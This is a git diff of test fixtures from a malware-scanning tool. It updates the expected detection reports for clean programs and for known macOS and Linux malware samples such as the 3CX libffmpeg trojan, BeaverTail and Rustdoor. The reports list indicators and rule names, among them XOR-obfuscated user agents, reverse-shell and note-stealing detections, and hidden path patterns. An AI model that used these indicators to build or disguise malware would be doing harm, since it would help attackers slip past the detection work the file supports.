[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index 8ba839e52..b873ee458 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -3,6 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[downloading](https://github.com/search?q=downloading&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple index b371cf324..a8e53c4ae 100644 --- a/tests/linux/clean/wolfictl.simple +++ b/tests/linux/clean/wolfictl.simple @@ -54,9 +54,9 @@ discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/macos/xprotect: medium -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/hidden: medium -evasion/hide_artifacts/system_directories: medium +evasion/file/location/dev_shm: medium +evasion/file/location/system_directories: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md index 78f16d5fd..68b70d3b9 100644 --- a/tests/linux/clean/zipdetails.md +++ b/tests/linux/clean/zipdetails.md @@ -5,7 +5,7 @@ | MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code) | | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/perl/bin/perl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fperl%2Fbin%2Fperl&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 327667eb1187fda8550949b91eabc61d7f6798c4..4103bb6b07683ee18884603a1261365db3b59e05 100644 GIT binary patch delta 64 zcmaE}jp@xcrVaLL+-aFPsrm&)scD%NlP^wjkSt3q&dkr#M-qm~u2Hj?Y#_zG`I%Z< F2>@mF8ZH0; delta 69 zcmaE}jp@xcrVaLL!Wo$[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff index 327667eb1187fda8550949b91eabc61d7f6798c4..4103bb6b07683ee18884603a1261365db3b59e05 100644 GIT binary patch delta 64 zcmaE}jp@xcrVaLL+-aFPsrm&)scD%NlP^wjkSt3q&dkr#M-qm~u2Hj?Y#_zG`I%Z< F2>@mF8ZH0; delta 69 zcmaE}jp@xcrVaLL!Wo$[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index 5df35e886..61fe8e8c7 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -24,7 +24,7 @@ | +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) | | +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple index a73095bc6..845055316 100644 --- a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple +++ b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple @@ -1,7 +1,7 @@ # macOS/2024.79-137-192-4/var_tmp_exe_starting2: critical anti-static/xor/certs: high c2/tool_transfer/osascript: high -evasion/hidden_paths/var_tmp: medium +evasion/file/location/var_tmp: medium exec/script/osa: medium exec/shell/exec: medium fs/file/make_executable: high diff --git a/tests/macOS/2024.BeaverTail/Jami.json b/tests/macOS/2024.BeaverTail/Jami.json index 2728b51ed..fb6273f27 100644 --- a/tests/macOS/2024.BeaverTail/Jami.json +++ b/tests/macOS/2024.BeaverTail/Jami.json @@ -37,6 +37,14 @@ "ID": "anti-static/binary/opaque", "RuleName": "opaque_binary" }, + { + "Description": "higher entropy binary (\u003e7.2)", + "RiskScore": 2, + "RiskLevel": "MEDIUM", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/entropy.yara#high_entropy_7_2", + "ID": "anti-static/macho/entropy", + "RuleName": "high_entropy_7_2" + }, { "Description": "higher-entropy machO trailer (normally NULL) - possible viral infection", "MatchStrings": [ diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple index 54e68b086..1a44a30ed 100644 --- a/tests/macOS/2024.BeaverTail/client_5346.py.simple +++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple @@ -4,7 +4,7 @@ c2/tool_transfer/python: high data/encoding/base64: low discover/system/platform: medium discover/user/HOME: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/indicator_blocking/mask_exceptions: medium exec/imports/python: medium exec/install_additional/pip_install: high diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple index 5851a1c32..b43228808 100644 --- a/tests/macOS/2024.Ezuri/libdpt1.so.simple +++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple @@ -12,6 +12,7 @@ fs/path/users: medium fs/permission/chown: medium fs/permission/modify: medium impact/remote_access/net_exec: medium +lateral/scan/tool: medium net/socket/receive: low net/socket/send: low process/multithreaded: low diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple index 8e89a4371..876122683 100644 --- a/tests/macOS/2024.LightSpy/dropper.simple +++ b/tests/macOS/2024.LightSpy/dropper.simple @@ -9,7 +9,7 @@ data/hash/md5: medium discover/system/cpu_info: low discover/system/network: high discover/system/platform: medium -evasion/hidden_paths/odd_pidfile: high +evasion/file/location/odd_pidfile: high exec/dylib/symbol_address: medium exec/dylib/user: medium exec/plugin: low diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple index 93837a90a..d5fe25d55 100644 --- a/tests/macOS/2024.Rustdoor/localfile.simple +++ b/tests/macOS/2024.Rustdoor/localfile.simple @@ -20,10 +20,10 @@ discover/system/cpu_info: medium discover/system/hardware_info: low discover/system/hostname_get: low discover/user/USER: low -evasion/hidden_paths/relative_hidden: low exec/dylib/symbol_address: medium exec/program: medium exec/program/background: low +exec/program/hidden: low exec/script/osa: medium exec/shell/exec: medium exfil/stealer/notes: critical @@ -45,6 +45,7 @@ fs/tempdir: low fs/tempdir/TMPDIR: low hw/disk_info: medium impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium malware/family/rustdoor: critical net/download: medium net/download/fetch: high diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 939d68075..cf15f5aae 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| -MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
